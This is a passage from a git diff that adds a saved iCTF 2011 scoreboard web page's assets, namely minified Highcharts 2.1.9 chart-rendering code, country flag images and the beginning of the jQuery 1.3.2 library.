a=this.options,b=this.xIncrement;b=A(b,a.pointStart,0);this.pointInterval=A(this.pointInterval,a.pointInterval,1);this.xIncrement=b+this.pointInterval;return b},cleanData:function(){var a=this.chart,b=this.data,c,d,e=a.smallestInterval,f,g;Hd(b,function(h,i){return h.x-i.x});if(this.options.connectNulls)for(g= +b.length-1;g>=0;g--)b[g].y===null&&b[g-1]&&b[g+1]&&b.splice(g,1);for(g=b.length-1;g>=0;g--)if(b[g-1]){f=b[g].x-b[g-1].x;if(f>0&&(d===Wa||f<d)){d=f;c=g}}if(e===Wa||d<e)a.smallestInterval=d;this.closestPoints=c},getSegments:function(){var a=-1,b=[],c=this.data;u(c,function(d,e){if(d.y===null){e>a+1&&b.push(c.slice(a+1,e));a=e}else e===c.length-1&&b.push(c.slice(a+1,e+1))});this.segments=b},setOptions:function(a){var b=this.chart.options.plotOptions;return Ca(b[this.type],b.series,a)},getColor:function(){var a= +this.chart.options.colors,b=this.chart.counters;this.color=this.options.color||a[b.color++]||"#0000ff";b.wrapColor(a.length)},getSymbol:function(){var a=this.chart.options.symbols,b=this.chart.counters;this.symbol=this.options.marker.symbol||a[b.symbol++];b.wrapSymbol(a.length)},addPoint:function(a,b,c,d){var e=this.data,f=this.graph,g=this.area,h=this.chart;a=(new this.pointClass).init(this,a);oc(d,h);if(f&&c)f.shift=c;if(g){g.shift=c;g.isArea=true}b=A(b,true);e.push(a);c&&e[0].remove(false);this.getAttribs(); +this.isDirty=true;b&&h.redraw()},setData:function(a,b){var c=this,d=c.data,e=c.initialColor,f=c.chart,g=d&&d.length||0;c.xIncrement=null;if(K(e))f.counters.color=e;for(a=tc(zc(a||[]),function(h){return(new c.pointClass).init(c,h)});g--;)d[g].destroy();c.data=a;c.cleanData();c.getSegments();c.getAttribs();c.isDirty=true;f.isDirtyBox=true;A(b,true)&&f.redraw(false)},remove:function(a,b){var c=this,d=c.chart;a=A(a,true);if(!c.isRemoving){c.isRemoving=true;Pa(c,"remove",null,function(){c.destroy();d.isDirtyLegend= +d.isDirtyBox=true;a&&d.redraw(b)})}c.isRemoving=false},translate:function(){for(var a=this.chart,b=this.options.stacking,c=this.xAxis.categories,d=this.yAxis,e=this.data,f=e.length;f--;){var g=e[f],h=g.x,i=g.y,j=g.low,m=d.stacks[(i<0?"-":"")+this.stackKey];g.plotX=this.xAxis.translate(h);if(b&&this.visible&&m&&m[h]){j=m[h];h=j.total;j.cum=j=j.cum-i;i=j+i;if(b==="percent"){j=h?j*100/h:0;i=h?i*100/h:0}g.percentage=h?g.y*100/h:0;g.stackTotal=h}if(K(j))g.yBottom=d.translate(j,0,1,0,1);if(i!==null)g.plotY= +d.translate(i,0,1,0,1);g.clientX=a.inverted?a.plotHeight-g.plotX:g.plotX;g.category=c&&c[g.x]!==Wa?c[g.x]:g.x}},setTooltipPoints:function(a){var b=this.chart,c=b.inverted,d=[],e=W((c?b.plotTop:b.plotLeft)+b.plotSizeX),f,g,h=[];if(a)this.tooltipPoints=null;u(this.segments,function(i){d=d.concat(i)});if(this.xAxis&&this.xAxis.reversed)d=d.reverse();u(d,function(i,j){f=d[j-1]?d[j-1]._high+1:0;for(g=i._high=d[j+1]?lb((i.plotX+(d[j+1]?d[j+1].plotX:e))/2):e;f<=g;)h[c?e-f++:f++]=i});this.tooltipPoints=h}, +onMouseOver:function(){var a=this.chart,b=a.hoverSeries;if(!(!Kb&&a.mouseIsDown)){b&&b!==this&&b.onMouseOut();this.options.events.mouseOver&&Pa(this,"mouseOver");this.tracker&&this.tracker.toFront();this.setState(Bb);a.hoverSeries=this}},onMouseOut:function(){var a=this.options,b=this.chart,c=b.tooltip,d=b.hoverPoint;d&&d.onMouseOut();this&&a.events.mouseOut&&Pa(this,"mouseOut");c&&!a.stickyTracking&&c.hide();this.setState();b.hoverSeries=null},animate:function(a){var b=this.chart,c=this.clipRect, +d=this.options.animation;if(d&&!Nb(d))d={};if(a){if(!c.isAnimating){c.attr("width",0);c.isAnimating=true}}else{c.animate({width:b.plotSizeX},d);this.animate=null}},drawPoints:function(){var a,b=this.data,c=this.chart,d,e,f,g,h,i;if(this.options.marker.enabled)for(f=b.length;f--;){g=b[f];d=g.plotX;e=g.plotY;i=g.graphic;if(e!==Wa&&!isNaN(e)){a=g.pointAttr[g.selected?"select":ib];h=a.r;if(i)i.animate({x:d,y:e,r:h});else g.graphic=c.renderer.symbol(A(g.marker&&g.marker.symbol,this.symbol),d,e,h).attr(a).add(this.group)}}}, +convertAttribs:function(a,b,c,d){var e=this.pointAttrToOptions,f,g,h={};a=a||{};b=b||{};c=c||{};d=d||{};for(f in e){g=e[f];h[f]=A(a[g],b[f],c[f],d[f])}return h},getAttribs:function(){var a=this,b=xb[a.type].marker?a.options.marker:a.options,c=b.states,d=c[Bb],e,f=a.color,g={stroke:f,fill:f},h=a.data,i=[],j,m=a.pointAttrToOptions,v;if(a.options.marker){d.radius=d.radius||b.radius+2;d.lineWidth=d.lineWidth||b.lineWidth+1}else d.color=d.color||bc(d.color||f).brighten(d.brightness).get();i[ib]=a.convertAttribs(b, +g);u([Bb,"select"],function(P){i[P]=a.convertAttribs(c[P],i[ib])});a.pointAttr=i;for(f=h.length;f--;){g=h[f];if((b=g.options&&g.options.marker||g.options)&&b.enabled===false)b.radius=0;e=false;if(g.options)for(v in m)if(K(b[m[v]]))e=true;if(e){j=[];c=b.states||{};e=c[Bb]=c[Bb]||{};if(!a.options.marker)e.color=bc(e.color||g.options.color).brighten(e.brightness||d.brightness).get();j[ib]=a.convertAttribs(b,i[ib]);j[Bb]=a.convertAttribs(c[Bb],i[Bb],j[ib]);j.select=a.convertAttribs(c.select,i.select, +j[ib])}else j=i;g.pointAttr=j}},destroy:function(){var a=this,b=a.chart,c=a.clipRect,d=/\/5[0-9\.]+ (Safari|Mobile)\//.test(yc),e,f;Pa(a,"destroy");pb(a);a.legendItem&&a.chart.legend.destroyItem(a);u(a.data,function(g){g.destroy()});if(c&&c!==b.clipRect)a.clipRect=c.destroy();u(["area","graph","dataLabelsGroup","group","tracker"],function(g){if(a[g]){e=d&&g==="group"?"hide":"destroy";a[g][e]()}});if(b.hoverSeries===a)b.hoverSeries=null;nc(b.series,a);for(f in a)delete a[f]},drawDataLabels:function(){if(this.options.dataLabels.enabled){var a, +b,c=this.data,d=this.options,e=d.dataLabels,f,g=this.dataLabelsGroup,h=this.chart,i=h.renderer,j=h.inverted,m=this.type,v;v=d.stacking;var P=m==="column"||m==="bar",T=e.verticalAlign===null,Y=e.y===null;if(P)if(v){if(T)e=Ca(e,{verticalAlign:"middle"});if(Y)e=Ca(e,{y:{top:14,middle:4,bottom:-6}[e.verticalAlign]})}else if(T)e=Ca(e,{verticalAlign:"top"});if(g)g.translate(h.plotLeft,h.plotTop);else g=this.dataLabelsGroup=i.g("data-labels").attr({visibility:this.visible?Ab:ob,zIndex:6}).translate(h.plotLeft, +h.plotTop).add();v=e.color;if(v==="auto")v=null;e.style.color=A(v,this.color,"black");u(c,function(H){var U=H.barX,z=U&&U+H.barW/2||H.plotX||-999,M=A(H.plotY,-999),y=H.dataLabel,C=e.align,Z=Y?H.y>=0?-6:12:e.y;f=e.formatter.call(H.getLabelConfig());a=(j?h.plotWidth-M:z)+e.x;b=(j?h.plotHeight-z:M)+Z;if(m==="column")a+={left:-1,right:1}[C]*H.barW/2||0;if(j&&H.y<0){C="right";a-=10}if(y){if(j&&!e.y)b=b+ja(y.styles.lineHeight)*0.9-y.getBBox().height/2;y.attr({text:f}).animate({x:a,y:b})}else if(K(f)){y= +H.dataLabel=i.text(f,a,b).attr({align:C,rotation:e.rotation,zIndex:1}).css(e.style).add(g);j&&!e.y&&y.attr({y:b+ja(y.styles.lineHeight)*0.9-y.getBBox().height/2})}if(P&&d.stacking&&y){z=H.barY;M=H.barW;H=H.barH;y.align(e,null,{x:j?h.plotWidth-z-H:U,y:j?h.plotHeight-U-M:z,width:j?H:M,height:j?M:H})}})}},drawGraph:function(){var a=this,b=a.options,c=a.graph,d=[],e,f=a.area,g=a.group,h=b.lineColor||a.color,i=b.lineWidth,j=b.dashStyle,m,v=a.chart.renderer,P=a.yAxis.getThreshold(b.threshold||0),T=/^area/.test(a.type), +Y=[],H=[];u(a.segments,function(U){m=[];u(U,function(C,Z){if(a.getPointSpline)m.push.apply(m,a.getPointSpline(U,C,Z));else{m.push(Z?Ka:Za);Z&&b.step&&m.push(C.plotX,U[Z-1].plotY);m.push(C.plotX,C.plotY)}});if(U.length>1)d=d.concat(m);else Y.push(U[0]);if(T){var z=[],M,y=m.length;for(M=0;M<y;M++)z.push(m[M]);y===3&&z.push(Ka,m[1],m[2]);if(b.stacking&&a.type!=="areaspline")for(M=U.length-1;M>=0;M--)z.push(U[M].plotX,U[M].yBottom);else z.push(Ka,U[U.length-1].plotX,P,Ka,U[0].plotX,P);H=H.concat(z)}}); +a.graphPath=d;a.singlePoints=Y;if(T){e=A(b.fillColor,bc(a.color).setOpacity(b.fillOpacity||0.75).get());if(f)f.animate({d:H});else a.area=a.chart.renderer.path(H).attr({fill:e}).add(g)}if(c){Hc(c);c.animate({d:d})}else if(i){c={stroke:h,"stroke-width":i};if(j)c.dashstyle=j;a.graph=v.path(d).attr(c).add(g).shadow(b.shadow)}},render:function(){var a=this,b=a.chart,c,d,e=a.options,f=e.animation,g=f&&a.animate;f=g?f&&f.duration||500:0;var h=a.clipRect,i=b.renderer;if(!h){h=a.clipRect=!b.hasRendered&& +b.clipRect?b.clipRect:i.clipRect(0,0,b.plotSizeX,b.plotSizeY);if(!b.clipRect)b.clipRect=h}if(!a.group){c=a.group=i.g("series");if(b.inverted){d=function(){c.attr({width:b.plotWidth,height:b.plotHeight}).invert()};d();Qa(b,"resize",d);Qa(a,"destroy",function(){pb(b,"resize",d)})}c.clip(a.clipRect).attr({visibility:a.visible?Ab:ob,zIndex:e.zIndex}).translate(b.plotLeft,b.plotTop).add(b.seriesGroup)}a.drawDataLabels();g&&a.animate(true);a.drawGraph&&a.drawGraph();a.drawPoints();a.options.enableMouseTracking!== +false&&a.drawTracker();g&&a.animate();setTimeout(function(){h.isAnimating=false;if((c=a.group)&&h!==b.clipRect&&h.renderer){c.clip(a.clipRect=b.clipRect);h.destroy()}},f);a.isDirty=false},redraw:function(){var a=this.chart,b=this.group;if(b){a.inverted&&b.attr({width:a.plotWidth,height:a.plotHeight});b.animate({translateX:a.plotLeft,translateY:a.plotTop})}this.translate();this.setTooltipPoints(true);this.render()},setState:function(a){var b=this.options,c=this.graph,d=b.states;b=b.lineWidth;a=a|| +ib;if(this.state!==a){this.state=a;if(!(d[a]&&d[a].enabled===false)){if(a)b=d[a].lineWidth||b+1;if(c&&!c.dashstyle)c.attr({"stroke-width":b},a?0:500)}}},setVisible:function(a,b){var c=this.chart,d=this.legendItem,e=this.group,f=this.tracker,g=this.dataLabelsGroup,h,i=this.data,j=c.options.chart.ignoreHiddenSeries;h=this.visible;h=(this.visible=a=a===Wa?!h:a)?"show":"hide";e&&e[h]();if(f)f[h]();else for(e=i.length;e--;){f=i[e];f.tracker&&f.tracker[h]()}g&&g[h]();d&&c.legend.colorizeItem(this,a);this.isDirty= +true;this.options.stacking&&u(c.series,function(m){if(m.options.stacking&&m.visible)m.isDirty=true});if(j)c.isDirtyBox=true;b!==false&&c.redraw();Pa(this,h)},show:function(){this.setVisible(true)},hide:function(){this.setVisible(false)},select:function(a){this.selected=a=a===Wa?!this.selected:a;if(this.checkbox)this.checkbox.checked=a;Pa(this,a?"select":"unselect")},drawTracker:function(){var a=this,b=a.options,c=[].concat(a.graphPath),d=c.length,e=a.chart,f=e.options.tooltip.snap,g=a.tracker,h=b.cursor; +h=h&&{cursor:h};var i=a.singlePoints,j;if(d)for(j=d+1;j--;){c[j]===Za&&c.splice(j+1,0,c[j+1]-f,c[j+2],Ka);if(j&&c[j]===Za||j===d)c.splice(j,0,Ka,c[j-2]+f,c[j-1])}for(j=0;j<i.length;j++){d=i[j];c.push(Za,d.plotX-f,d.plotY,Ka,d.plotX+f,d.plotY)}if(g)g.attr({d:c});else a.tracker=e.renderer.path(c).attr({isTracker:true,stroke:ce,fill:jb,"stroke-width":b.lineWidth+2*f,visibility:a.visible?Ab:ob,zIndex:b.zIndex||1}).on(Kb?"touchstart":"mouseover",function(){e.hoverSeries!==a&&a.onMouseOver()}).on("mouseout", +function(){b.stickyTracking||a.onMouseOut()}).css(h).add(e.trackerGroup)}};ma=yb(sb);wb.line=ma;ma=yb(sb,{type:"area"});wb.area=ma;ma=yb(sb,{type:"spline",getPointSpline:function(a,b,c){var d=b.plotX,e=b.plotY,f=a[c-1],g=a[c+1],h,i,j,m;if(c&&c<a.length-1){a=f.plotY;j=g.plotX;g=g.plotY;var v;h=(1.5*d+f.plotX)/2.5;i=(1.5*e+a)/2.5;j=(1.5*d+j)/2.5;m=(1.5*e+g)/2.5;v=(m-i)*(j-d)/(j-h)+e-m;i+=v;m+=v;if(i>a&&i>e){i=Ia(a,e);m=2*e-i}else if(i<a&&i<e){i=tb(a,e);m=2*e-i}if(m>g&&m>e){m=Ia(g,e);i=2*e-m}else if(m< +g&&m<e){m=tb(g,e);i=2*e-m}b.rightContX=j;b.rightContY=m}if(c){b=["C",f.rightContX||f.plotX,f.rightContY||f.plotY,h||d,i||e,d,e];f.rightContX=f.rightContY=null}else b=[Za,d,e];return b}});wb.spline=ma;ma=yb(ma,{type:"areaspline"});wb.areaspline=ma;var hd=yb(sb,{type:"column",pointAttrToOptions:{stroke:"borderColor","stroke-width":"borderWidth",fill:"color",r:"borderRadius"},init:function(){sb.prototype.init.apply(this,arguments);var a=this,b=a.chart;b.hasColumn=true;b.hasRendered&&u(b.series,function(c){if(c.type=== +a.type)c.isDirty=true})},translate:function(){var a=this,b=a.chart,c=a.options,d=c.stacking,e=c.borderWidth,f=0,g=a.xAxis.reversed,h=a.xAxis.categories,i={},j,m;sb.prototype.translate.apply(a);u(b.series,function(C){if(C.type===a.type&&C.visible){if(C.options.stacking){j=C.stackKey;if(i[j]===Wa)i[j]=f++;m=i[j]}else m=f++;C.columnIndex=m}});var v=a.data,P=a.closestPoints;h=bb(v[1]?v[P].plotX-v[P-1].plotX:b.plotSizeX/(h&&h.length||1));P=h*c.groupPadding;var T=(h-2*P)/f,Y=c.pointWidth,H=K(Y)?(T-Y)/2: +T*c.pointPadding,U=Ia(A(Y,T-2*H),1),z=H+(P+((g?f-a.columnIndex:a.columnIndex)||0)*T-h/2)*(g?-1:1),M=a.yAxis.getThreshold(c.threshold||0),y=A(c.minPointLength,5);u(v,function(C){var Z=C.plotY,Sa=C.yBottom||M,Na=C.plotX+z,Ea=md(tb(Z,Sa)),gb=md(Ia(Z,Sa)-Ea),Lb=a.yAxis.stacks[(C.y<0?"-":"")+a.stackKey],Rb;d&&a.visible&&Lb&&Lb[C.x]&&Lb[C.x].setOffset(z,U);if(bb(gb)<y){if(y){gb=y;Ea=bb(Ea-M)>y?Sa-y:M-(Z<=M?y:0)}Rb=Ea-3}sa(C,{barX:Na,barY:Ea,barW:U,barH:gb});C.shapeType="rect";Z=sa(b.renderer.Element.prototype.crisp.apply({}, +[e,Na,Ea,U,gb]),{r:c.borderRadius});if(e%2){Z.y-=1;Z.height+=1}C.shapeArgs=Z;C.trackerArgs=K(Rb)&&Ca(C.shapeArgs,{height:Ia(6,gb+3),y:Rb})})},getSymbol:function(){},drawGraph:function(){},drawPoints:function(){var a=this,b=a.options,c=a.chart.renderer,d,e;u(a.data,function(f){var g=f.plotY;if(g!==Wa&&!isNaN(g)&&f.y!==null){d=f.graphic;e=f.shapeArgs;if(d){Hc(d);d.animate(e)}else f.graphic=c[f.shapeType](e).attr(f.pointAttr[f.selected?"select":ib]).add(a.group).shadow(b.shadow)}})},drawTracker:function(){var a= +this,b=a.chart,c=b.renderer,d,e,f=+new Date,g=a.options,h=g.cursor,i=h&&{cursor:h},j;u(a.data,function(m){e=m.tracker;d=m.trackerArgs||m.shapeArgs;delete d.strokeWidth;if(m.y!==null)if(e)e.attr(d);else m.tracker=c[m.shapeType](d).attr({isTracker:f,fill:ce,visibility:a.visible?Ab:ob,zIndex:g.zIndex||1}).on(Kb?"touchstart":"mouseover",function(v){j=v.relatedTarget||v.fromElement;b.hoverSeries!==a&&Ga(j,"isTracker")!==f&&a.onMouseOver();m.onMouseOver()}).on("mouseout",function(v){if(!g.stickyTracking){j= +v.relatedTarget||v.toElement;Ga(j,"isTracker")!==f&&a.onMouseOut()}}).css(i).add(m.group||b.trackerGroup)})},animate:function(a){var b=this,c=b.data;if(!a){u(c,function(d){var e=d.graphic;d=d.shapeArgs;if(e){e.attr({height:0,y:b.yAxis.translate(0,0,1)});e.animate({height:d.height,y:d.y},b.options.animation)}});b.animate=null}},remove:function(){var a=this,b=a.chart;b.hasRendered&&u(b.series,function(c){if(c.type===a.type)c.isDirty=true});sb.prototype.remove.apply(a,arguments)}});wb.column=hd;ma=yb(hd, +{type:"bar",init:function(a){a.inverted=this.inverted=true;hd.prototype.init.apply(this,arguments)}});wb.bar=ma;ma=yb(sb,{type:"scatter",translate:function(){var a=this;sb.prototype.translate.apply(a);u(a.data,function(b){b.shapeType="circle";b.shapeArgs={x:b.plotX,y:b.plotY,r:a.chart.options.tooltip.snap}})},drawTracker:function(){var a=this,b=a.options.cursor,c=b&&{cursor:b},d;u(a.data,function(e){(d=e.graphic)&&d.attr({isTracker:true}).on("mouseover",function(){a.onMouseOver();e.onMouseOver()}).on("mouseout", +function(){a.options.stickyTracking||a.onMouseOut()}).css(c)})},cleanData:function(){}});wb.scatter=ma;ma=yb(Oc,{init:function(){Oc.prototype.init.apply(this,arguments);var a=this,b;sa(a,{visible:a.visible!==false,name:A(a.name,"Slice")});b=function(){a.slice()};Qa(a,"select",b);Qa(a,"unselect",b);return a},setVisible:function(a){var b=this.series.chart,c=this.tracker,d=this.dataLabel,e=this.connector,f=this.shadowGroup,g;g=(this.visible=a=a===Wa?!this.visible:a)?"show":"hide";this.group[g]();c&& +c[g]();d&&d[g]();e&&e[g]();f&&f[g]();this.legendItem&&b.legend.colorizeItem(this,a)},slice:function(a,b,c){var d=this.series.chart,e=this.slicedTranslation;oc(c,d);A(b,true);a=this.sliced=K(a)?a:!this.sliced;a={translateX:a?e[0]:d.plotLeft,translateY:a?e[1]:d.plotTop};this.group.animate(a);this.shadowGroup&&this.shadowGroup.animate(a)}});ma=yb(sb,{type:"pie",isCartesian:false,pointClass:ma,pointAttrToOptions:{stroke:"borderColor","stroke-width":"borderWidth",fill:"color"},getColor:function(){this.initialColor= +this.chart.counters.color},animate:function(){var a=this;u(a.data,function(b){var c=b.graphic;b=b.shapeArgs;var d=-kc/2;if(c){c.attr({r:0,start:d,end:d});c.animate({r:b.r,start:b.start,end:b.end},a.options.animation)}});a.animate=null},translate:function(){var a=0,b=-0.25,c=this.options,d=c.slicedOffset,e=d+c.borderWidth,f=c.center.concat([c.size,c.innerSize||0]),g=this.chart,h=g.plotWidth,i=g.plotHeight,j,m,v,P=this.data,T=2*kc,Y,H=tb(h,i),U,z,M,y=c.dataLabels.distance;f=tc(f,function(C,Z){return(U= +/%$/.test(C))?[h,i,H,H][Z]*ja(C)/100:C});this.getX=function(C,Z){v=Fa.asin((C-f[1])/(f[2]/2+y));return f[0]+(Z?-1:1)*rb(v)*(f[2]/2+y)};this.center=f;u(P,function(C){a+=C.y});u(P,function(C){Y=a?C.y/a:0;j=W(b*T*1E3)/1E3;b+=Y;m=W(b*T*1E3)/1E3;C.shapeType="arc";C.shapeArgs={x:f[0],y:f[1],r:f[2]/2,innerR:f[3]/2,start:j,end:m};v=(m+j)/2;C.slicedTranslation=tc([rb(v)*d+g.plotLeft,Cb(v)*d+g.plotTop],W);z=rb(v)*f[2]/2;M=Cb(v)*f[2]/2;C.tooltipPos=[f[0]+z*0.7,f[1]+M*0.7];C.labelPos=[f[0]+z+rb(v)*y,f[1]+M+Cb(v)* +y,f[0]+z+rb(v)*e,f[1]+M+Cb(v)*e,f[0]+z,f[1]+M,y<0?"center":v<T/4?"left":"right",v];C.percentage=Y*100;C.total=a});this.setTooltipPoints()},render:function(){this.drawPoints();this.options.enableMouseTracking!==false&&this.drawTracker();this.drawDataLabels();this.options.animation&&this.animate&&this.animate();this.isDirty=false},drawPoints:function(){var a=this.chart,b=a.renderer,c,d,e,f=this.options.shadow,g,h;u(this.data,function(i){d=i.graphic;h=i.shapeArgs;e=i.group;g=i.shadowGroup;if(f&&!g)g= +i.shadowGroup=b.g("shadow").attr({zIndex:4}).add();if(!e)e=i.group=b.g("point").attr({zIndex:5}).add();c=i.sliced?i.slicedTranslation:[a.plotLeft,a.plotTop];e.translate(c[0],c[1]);g&&g.translate(c[0],c[1]);if(d)d.animate(h);else i.graphic=b.arc(h).attr(sa(i.pointAttr[ib],{"stroke-linejoin":"round"})).add(i.group).shadow(f,g);i.visible===false&&i.setVisible(false)})},drawDataLabels:function(){var a=this.data,b,c=this.chart,d=this.options.dataLabels,e=A(d.connectorPadding,10),f=A(d.connectorWidth,1), +g,h,i=A(d.softConnector,true),j=d.distance,m=this.center,v=m[2]/2;m=m[1];var P=j>0,T=[[],[]],Y,H,U,z,M=2,y;if(d.enabled){sb.prototype.drawDataLabels.apply(this);u(a,function(gb){if(gb.dataLabel)T[gb.labelPos[7]<kc/2?0:1].push(gb)});T[1].reverse();z=function(gb,Lb){return Lb.y-gb.y};for(a=T[0][0]&&T[0][0].dataLabel&&ja(T[0][0].dataLabel.styles.lineHeight);M--;){var C=[],Z=[],Sa=T[M],Na=Sa.length,Ea;for(y=m-v-j;y<=m+v+j;y+=a)C.push(y);U=C.length;if(Na>U){h=[].concat(Sa);h.sort(z);for(y=Na;y--;)h[y].rank= +y;for(y=Na;y--;)Sa[y].rank>=U&&Sa.splice(y,1);Na=Sa.length}for(y=0;y<Na;y++){b=Sa[y];h=b.labelPos;b=9999;for(H=0;H<U;H++){g=bb(C[H]-h[1]);if(g<b){b=g;Ea=H}}if(Ea<y&&C[y]!==null)Ea=y;else{if(U<Na-y+Ea&&C[y]!==null)Ea=U-Na+y;for(;C[Ea]===null;)Ea++}Z.push({i:Ea,y:C[Ea]});C[Ea]=null}Z.sort(z);for(y=0;y<Na;y++){b=Sa[y];h=b.labelPos;g=b.dataLabel;H=Z.pop();Y=h[1];U=b.visible===false?ob:Ab;Ea=H.i;H=H.y;if(Y>H&&C[Ea+1]!==null||Y<H&&C[Ea-1]!==null)H=Y;Y=this.getX(Ea===0||Ea===C.length-1?Y:H,M);g.attr({visibility:U, +align:h[6]})[g.moved?"animate":"attr"]({x:Y+d.x+({left:e,right:-e}[h[6]]||0),y:H+d.y});g.moved=true;if(P&&f){g=b.connector;h=i?[Za,Y+(h[6]==="left"?5:-5),H,"C",Y,H,2*h[2]-h[4],2*h[3]-h[5],h[2],h[3],Ka,h[4],h[5]]:[Za,Y+(h[6]==="left"?5:-5),H,Ka,h[2],h[3],Ka,h[4],h[5]];if(g){g.animate({d:h});g.attr("visibility",U)}else b.connector=g=this.chart.renderer.path(h).attr({"stroke-width":f,stroke:d.connectorColor||b.color||"#606060",visibility:U,zIndex:3}).translate(c.plotLeft,c.plotTop).add()}}}}},drawTracker:hd.prototype.drawTracker, +getSymbol:function(){}});wb.pie=ma;db.Highcharts={Chart:Nd,dateFormat:Zc,pathAnim:Nc,getOptions:function(){return Xa},hasRtlBug:me,numberFormat:Ed,Point:Oc,Color:bc,Renderer:fd,seriesTypes:wb,setOptions:function(a){Xa=Ca(Xa,a);Id();return Xa},Series:sb,addEvent:Qa,removeEvent:pb,createElement:hb,discardElement:pc,css:Ja,each:u,extend:sa,map:tc,merge:Ca,pick:A,extendClass:yb,product:"Highcharts",version:"2.1.9"}})(); diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/hu.png b/ictf2011/scoreboard.ictf2011_end.info_files/hu.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/in.png b/ictf2011/scoreboard.ictf2011_end.info_files/in.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/it.png b/ictf2011/scoreboard.ictf2011_end.info_files/it.png Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/jquery.min.js b/ictf2011/scoreboard.ictf2011_end.info_files/jquery.min.js @@ -0,0 +1,19 @@ +/* + * jQuery JavaScript Library v1.3.2 + * http://jquery.com/ + * + * Copyright (c) 2009 John Resig + * Dual licensed under the MIT and GPL licenses. + * http://docs.jquery.com/License + * + * Date: 2009-02-19 17:34:21 -0500 (Thu, 19 Feb 2009) + * Revision: 6246 + */ +(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;return F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(document).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;this.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(E))},selector:"",jquery:"1.3.2",size:function(){return this.length},get:function(E){return E===g?Array.prototype.slice.call(this):this[E]},pushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.context;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setArray:function(E){this.length=0;Array.prototype.push.apply(this,E);return this},each:function(F,E){return o.each(this,F,E)},index:function(E){return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){var E=F;if(typeof F==="string"){if(H===g){return this[0]&&o[G||"attr"](this[0],F)}else{E={};E[F]=H}}return this.each(function(I){for(F in E){o.attr(G?this.style:this,F,o.prop(this,E[F],G,I,F))}})},css:function(E,F){if((E=="width"||E=="height")&&parseFloat(F)<0){F=g}return this.attr(E,F,"curCSS")},text:function(F){if(typeof F!=="object"&&F!=null){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(F))}var E="";o.each(F||this,function(){o.each(this.childNodes,function(){if(this.nodeType!=8){E+=this.nodeType!=1?this.nodeValue:o.fn.text([this])}})});return E},wrapAll:function(E){if(this[0]){var F=o(E,this[0].ownerDocument).clone();if(this[0].parentNode){F.insertBefore(this[0])}F.map(function(){var G=this;while(G.firstChild){G=G.firstChild}return G}).append(this)}return this},wrapInner:function(E){return this.each(function(){o(this).contents().wrapAll(E)})},wrap:function(E){return this.each(function(){o(this).wrapAll(E)})},append:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.appendChild(E)}})},prepend:function(){return this.domManip(arguments,true,function(E){if(this.nodeType==1){this.insertBefore(E,this.firstChild)}})},before:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this)})},after:function(){return this.domManip(arguments,false,function(E){this.parentNode.insertBefore(E,this.nextSibling)})},end:function(){return this.prevObject||o([])},push:[].push,sort:[].sort,splice:[].splice,find:function(E){if(this.length===1){var F=this.pushStack([],"find",E);F.length=0;o.find(E,this[0],F);return F}else{return this.pushStack(o.unique(o.map(this,function(G){return o.find(E,G)})),"find",E)}},clone:function(G){var E=this.map(function(){if(!o.support.noCloneEvent&&!o.isXMLDoc(this)){var I=this.outerHTML;if(!I){var J=this.ownerDocument.createElement("div");J.appendChild(this.cloneNode(true));I=J.innerHTML}return o.clean([I.replace(/ jQuery\d+="(?:\d+|null)"/g,"").replace(/^\s*/,"")])[0]}else{return this.cloneNode(true)}});if(G===true){var H=this.find("*").andSelf(),F=0;E.find("*").andSelf().each(function(){if(this.nodeName!==H[F].nodeName){return}var I=o.data(H[F],"events");for(var K in I){for(var J in I[K]){o.event.add(this,K,I[K][J],I[K][J].data)}}F++})}return E},filter:function(E){return this.pushStack(o.isFunction(E)&&o.grep(this,function(G,F){return E.call(G,F)})||o.multiFilter(E,o.grep(this,function(F){return F.nodeType===1})),"filter",E)},closest:function(E){var G=o.expr.match.POS.test(E)?o(E):null,F=0;return this.map(function(){var H=this;while(H&&H.ownerDocument){if(G?G.index(H)>-1:o(H).is(E)){o.data(H,"closest",F);return H}H=H.parentNode;F++}})},not:function(E){if(typeof E==="string"){if(f.test(E)){return this.pushStack(o.multiFilter(E,this,true),"not",E)}else{E=o.multiFilter(E,this)}}var F=E.length&&E[E.length-1]!==g&&!E.nodeType;return this.filter(function(){return F?o.inArray(this,E)<0:this!=E})},add:function(E){return this.pushStack(o.unique(o.merge(this.get(),typeof E==="string"?o(E):o.makeArray(E))))},is:function(E){return !!E&&o.multiFilter(E,this).length>0},hasClass:function(E){return !!E&&this.is("."+E)},val:function(K){if(K===g){var E=this[0];if(E){if(o.nodeName(E,"option")){return(E.attributes.value||{}).specified?E.value:E.text}if(o.nodeName(E,"select")){var I=E.selectedIndex,L=[],M=E.options,H=E.type=="select-one";if(I<0){return null}for(var F=H?I:0,J=H?I+1:M.length;F<J;F++){var G=M[F];if(G.selected){K=o(G).val();if(H){return K}L.push(K)}}return L}return(E.value||"").replace(/\r/g,"")}return g}if(typeof K==="number"){K+=""}return this.each(function(){if(this.nodeType!=1){return}if(o.isArray(K)&&/radio|checkbox/.test(this.type)){this.checked=(o.inArray(this.value,K)>=0||o.inArray(this.name,K)>=0)}else{if(o.nodeName(this,"select")){var 